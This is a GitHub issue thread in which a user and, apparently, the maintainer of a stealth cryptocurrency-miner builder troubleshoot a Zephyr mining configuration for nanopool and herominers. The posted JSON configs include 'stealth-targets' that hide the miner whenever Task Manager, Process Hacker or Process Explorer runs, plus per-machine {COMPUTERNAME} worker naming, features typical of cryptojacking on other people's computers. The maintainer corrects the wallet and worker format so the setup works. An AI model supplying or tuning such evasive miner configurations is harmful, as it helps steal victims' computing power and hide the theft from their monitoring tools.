Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Zephyr setup #2365

Open
MohammedGeorge opened this issue Apr 29, 2024 · 13 comments
Open

Zephyr setup #2365

MohammedGeorge opened this issue Apr 29, 2024 · 13 comments

Comments

@MohammedGeorge
Copy link

{
"algo": "rx/0",
"pool": "ru.zephyr.herominers.com",
"port": 1123,
"wallet": "ZEPHs9TXBLaLLJB84M2UsrfZqkxRzsGY5GEz4Kw5VVMfbiSvoDnEe3GUYAPxcpedCLWrag9uoY7QjjEfYaKBozY2LerL1nwLA9e",
"password": "{COMPUTERNAME}",
"nicehash": false,
"ssltls": true,
"max-cpu": 20,
"idle-wait": 1,
"idle-cpu": 100,
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
"kill-targets": "",
"stealth-fullscreen": true
}

is everything correct in my miner settings?

@MohammedGeorge
Copy link
Author

oh i saw if there low workers they block withdraws ?

@MohammedGeorge
Copy link
Author

image
Also i will use zephyr wallet for tradeogre is it okey right ?

@MohammedGeorge
Copy link
Author

{
"algo": "rx/0",
"pool": "zeph-eu1.nanopool.org",
"port": 10943,
"wallet": "ZEPHs9TXBLaLLJB84M2UsrfZqkxRzsGY5GEz4Kw5VVMfbiSvoDnEe3GUYAPxcpedCLWrag9uoY7QjjEfYaKBozY2LerL1nwLA9e",
"password": "{COMPUTERNAME}",
"nicehash": false,
"ssltls": true,
"max-cpu": 20,
"idle-wait": 1,
"idle-cpu": 100,
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
"kill-targets": "",
"stealth-fullscreen": true
}

is it okey rn?

@UnamSanctam
Copy link
Owner

UnamSanctam commented Apr 29, 2024

Yes those settings seem correct, though for a worker name on nanopool it should be like this:

{
"algo": "rx/0",
"pool": "zeph-eu1.nanopool.org",
"port": 10943,
"wallet": "ZEPHs9TXBLaLLJB84M2UsrfZqkxRzsGY5GEz4Kw5VVMfbiSvoDnEe3GUYAPxcpedCLWrag9uoY7QjjEfYaKBozY2LerL1nwLA9e.{COMPUTERNAME}/WithdrawalPassword",
"password": "",
"nicehash": false,
"ssltls": true,
"max-cpu": 20,
"idle-wait": 1,
"idle-cpu": 100,
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
"kill-targets": "",
"stealth-fullscreen": true
}

The WithdrawalPassword is the password that you can sue to change your minimum withdrawal amount of nanopool.

Also i will use zephyr wallet for tradeogre is it okey right ?

You can though it's not allowed by TradeOgre I believe (it's usually banned by all exchanges) and TradeOgre can also change your wallet address at any time. Usually one should not mine to an exchange.

@MohammedGeorge
Copy link
Author

image
Why i cant see my workers sir i wrote {COMPUTERNAME}

@UnamSanctam
Copy link
Owner

Sorry it should be .{COMPUTERNAME}/WithdrawlPassword after the wallet, I forgot to include the dot. Did you include the dot in yours? Then it should appear when your miner finds its next share.

@MohammedGeorge
Copy link
Author

"I didn't quite understand. Isn't it like my config?
"wallet": "ZEPHs9TXBLaLLJB84M2UsrfZqkxRzsGY5GEz4Kw5VVMfbiSvoDnEe3GUYAPxcpedCLWrag9uoY7QjjEfYaKBozY2LerL1nwLA9e.{COMPUTERNAME}/WithdrawalPassword",

@MohammedGeorge
Copy link
Author

I wrote {COMPUTERNAME} in the Password section of the Builder.

@MohammedGeorge
Copy link
Author

image
It still doesn't seem to be working; did I make a mistake somewhere? Could you please help me?

@UnamSanctam
Copy link
Owner

This should be correct yes ZEPHs9TXBLaLLJB84M2UsrfZqkxRzsGY5GEz4Kw5VVMfbiSvoDnEe3GUYAPxcpedCLWrag9uoY7QjjEfYaKBozY2LerL1nwLA9e.{COMPUTERNAME}/WithdrawalPassword. And the password field does nothing when using nanopool. Can you run the checker and post a screenshot here?

@MohammedGeorge
Copy link
Author

image

This should be correct yes ZEPHs9TXBLaLLJB84M2UsrfZqkxRzsGY5GEz4Kw5VVMfbiSvoDnEe3GUYAPxcpedCLWrag9uoY7QjjEfYaKBozY2LerL1nwLA9e.{COMPUTERNAME}/WithdrawalPassword. And the password field does nothing when using nanopool. Can you run the checker and post a screenshot here?

I didn't add anything to the end of my wallet address, is that why it's not showing up?

@UnamSanctam
Copy link
Owner

Yes your "Wallet Address" field should contain this:
ZEPHs9TXBLaLLJB84M2UsrfZqkxRzsGY5GEz4Kw5VVMfbiSvoDnEe3GUYAPxcpedCLWrag9uoY7QjjEfYaKBozY2LerL1nwLA9e.{COMPUTERNAME}/WithdrawalPassword
And the "Password" field should be empty.

@MohammedGeorge
Copy link
Author

Got it thank you sir i will try

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants